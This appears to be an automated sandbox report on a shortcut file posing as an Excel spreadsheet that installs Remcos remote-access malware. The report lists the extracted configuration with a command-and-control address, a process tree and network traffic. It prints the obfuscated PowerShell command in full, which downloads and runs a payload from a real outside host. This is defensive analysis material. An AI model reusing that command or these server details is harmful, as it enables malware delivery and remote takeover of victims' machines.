Analysis (score 10)
max time kernel: 148s
max time network: 136s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 07-09-2024 01:16
Static task: static1
Behavioral task: behavioral1, sample brt_1_0147.doc.lnk, resource win7-20240903-en
Behavioral task: behavioral2, sample brt_1_0147.doc.lnk, resource win10v2004-20240802-en
Behavioral task: behavioral3, sample oshad_88.docx.lnk, resource win7-20240704-en
Behavioral task: behavioral4, sample oshad_88.docx.lnk, resource win10v2004-20240802-en
Behavioral task: behavioral5, sample rv_luti_2024_roku.xlsx.lnk, resource win7-20240903-en
Behavioral task: behavioral6, sample rv_luti_2024_roku.xlsx.lnk, resource win10v2004-20240802-en
Behavioral task: behavioral7, sample telegrama_ksv_po_btgr.jpg.lnk, resource win7-20240903-en
General
Target: rv_luti_2024_roku.xlsx.lnk
Size: 32KB
MD5: bbcc000caf3fff5b3025da99cff2aa45
SHA1: 89a89db57a5b286b16d8d0a82903a4f256584bb5
SHA256: 3e5adec34d0e3567b3eed2c917eaac783ff3eb19c2a1154339ebd1b2497f1e24
SHA512: 1eecf2183c2909e642904dc023256b8f1437a25d59c541afa53b6eff4c9f727ef1fcdc3a7507f94e5d75ba490263c5a0fa2be95a1cfc4734a07a874d4bba56e1
SSDEEP: 48:88muavUQSSE1I3fxvUZ7sEmOxCCevUZ731EdCZFXuGdZTa7x:88y8EE1YfxHERxCVybuKQ
Malware Config
Extracted
Family: remcos
Botnet: stalagg
C2: 5.181.156.117:8576
audio_folder: MicRecords
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: false
install_flag: false
keylog_crypt: false
keylog_file: logs.dat
keylog_flag: false
keylog_folder: remcos
mouse_option: false
mutex: Rmc-5TL39W
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
take_screenshot_option: false
take_screenshot_time: 5
Signatures

Blocklisted process makes network request (1 IoC)
  flow 3, pid 4936, powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation (cmd.exe)

Executes dropped EXE (2 IoCs)
  pid 3776 scr_previw.exe; pid 1824 scr_previw.exe

Loads dropped DLL (2 IoCs)
  pid 3776 scr_previw.exe; pid 1824 scr_previw.exe

Suspicious use of SetThreadContext (1 IoC)
  PID 1824 set thread context of 2848: pid 1824, scr_previw.exe, procid_target 102

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 4 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (scr_previw.exe)
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (cmd.exe)
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (explorer.exe)
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (scr_previw.exe)

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (EXCEL.EXE)

Enumerates system info in registry (2 TTPs, 3 IoCs)
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (EXCEL.EXE)

Modifies registry class (1 IoC)
  Key created: \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings (powershell.exe)

Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid 3272 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid 4936 powershell.exe (x2); pid 3776 scr_previw.exe; pid 1824 scr_previw.exe (x2); pid 2848 cmd.exe (x2)

Suspicious behavior: MapViewOfSection (2 IoCs)
  pid 1824 scr_previw.exe; pid 2848 cmd.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, pid 4936, powershell.exe

Suspicious use of SetWindowsHookEx (12 IoCs)
  pid 3272 EXCEL.EXE (x12)

Suspicious use of WriteProcessMemory (22 IoCs)
  PID 1700 wrote to memory of 4936: cmd.exe, procid_target 87 (x2)
  PID 4936 wrote to memory of 3776: powershell.exe, procid_target 99 (x3)
  PID 4936 wrote to memory of 3272: powershell.exe, procid_target 100 (x3)
  PID 3776 wrote to memory of 1824: scr_previw.exe, procid_target 101 (x3)
  PID 1824 wrote to memory of 2848: scr_previw.exe, procid_target 102 (x4)
  PID 3272 wrote to memory of 4044: EXCEL.EXE, procid_target 107 (x2)
  PID 2848 wrote to memory of 1320: cmd.exe, procid_target 110 (x5)
Processes (indentation shows the process tree; the number in brackets is the depth shown in the report)

[1] C:\Windows\system32\cmd.exe (PID 1700)
    cmd /c C:\Users\Admin\AppData\Local\Temp\rv_luti_2024_roku.xlsx.lnk
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4936)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo mDDkSKPeKSnmyhDKrRrfgmsmeF; echo anUGxZjKUCNgLKMBbyEjctOscTtBFAQROSENvflIdGfTRJUxVqfCL; echo ykxRyjMJeSrZAgkrYWGta; if (-not(Test-Path 'glorytoukraine.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/glorytoukraine.zip -OutFile glorytoukraine.zip}; echo EMNQacYrNXHyebrpmkIKUbKIwHYVxkqDyqbnvplWDcpbb; Expand-Archive -Path glorytoukraine.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/scr_previw.exe; echo XbwVjPDNPkbnuGZQfsRvcJknOPJXCFbqSFCKR; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/racs/rv_luti_2024_roku.xlsx -OutFile rv_luti_2024_roku.xlsx; echo zqCIRBDMssIzkDEUagHLMaYQOxVloBQv; s''t''a''rt rv_luti_2024_roku.xlsx
      - Blocklisted process makes network request
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe (PID 3776)
        "C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory

      [4] C:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exe (PID 1824)
          C:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exe
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of SetThreadContext
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: MapViewOfSection
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\SysWOW64\cmd.exe (PID 2848)
            C:\Windows\SysWOW64\cmd.exe
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: MapViewOfSection
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\SysWOW64\explorer.exe (PID 1320)
              C:\Windows\SysWOW64\explorer.exe
              - System Location Discovery: System Language Discovery

    [3] C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 3272)
        "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\rv_luti_2024_roku.xlsx"
        - Checks processor information in registry
        - Enumerates system info in registry
        - Suspicious behavior: AddClipboardFormatListener
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\splwow64.exe (PID 4044)
          C:\Windows\splwow64.exe 12288

[1] C:\Windows\system32\svchost.exe (PID 3008)
    C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
Network

Remote address: 5.181.156.117:80
Request:
GET /glorytoukraine.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: 5.181.156.117
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 28 Aug 2024 15:21:08 GMT
ETag: "2e931b-620bfe845e100"
Accept-Ranges: bytes
Content-Length: 3052315
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/zip

Remote address: 5.181.156.117:80
Request:
GET /racs/rv_luti_2024_roku.xlsx HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: 5.181.156.117
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 24 Jul 2024 21:02:48 GMT
ETag: "8201-61e0499b8ee00"
Accept-Ranges: bytes
Content-Length: 33281
Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet

Remote address: 8.8.8.8:53
Request: 117.156.181.5.in-addr.arpa IN PTR
Response: 117.156.181.5.in-addr.arpa IN PTR no-rdns.mivocloud.com
Remote address: 8.8.8.8:53
Request: roaming.officeapps.live.com IN A
Response:
roaming.officeapps.live.com IN CNAME prod.roaming1.live.com.akadns.net
prod.roaming1.live.com.akadns.net IN CNAME eur.roaming1.live.com.akadns.net
eur.roaming1.live.com.akadns.net IN CNAME weu-azsc-000.roaming.officeapps.live.com
weu-azsc-000.roaming.officeapps.live.com IN CNAME osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com
osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com IN A 52.109.89.19

Remote address: 52.109.89.19:443
Request:
POST /rs/RoamingSoapService.svc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
User-Agent: MS-WebServices/1.0
SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
Content-Length: 511
Host: roaming.officeapps.live.com
Response:
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/10.0
X-OfficeFE: RoamingFE_IN_81
X-OfficeVersion: 16.0.18025.30575
X-OfficeCluster: weu-000.roaming.officeapps.live.com
X-CorrelationId: 10c3167c-5fa8-43a2-b5c3-bd87dc577041
X-Powered-By: ASP.NET
Date: Sat, 07 Sep 2024 01:18:11 GMT
Content-Length: 654
Flow: 67.4kB 3.2MB 1406 2278
HTTP Request: GET http://5.181.156.117/glorytoukraine.zip
HTTP Response: 200
HTTP Request: GET http://5.181.156.117/racs/rv_luti_2024_roku.xlsx
HTTP Response: 200

Flow: 1.7kB 7.7kB 11 10
HTTP Request: POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
HTTP Response: 200

Flow: 1.9kB 1.2kB 10 10
MITRE ATT&CK Enterprise v15
Downloads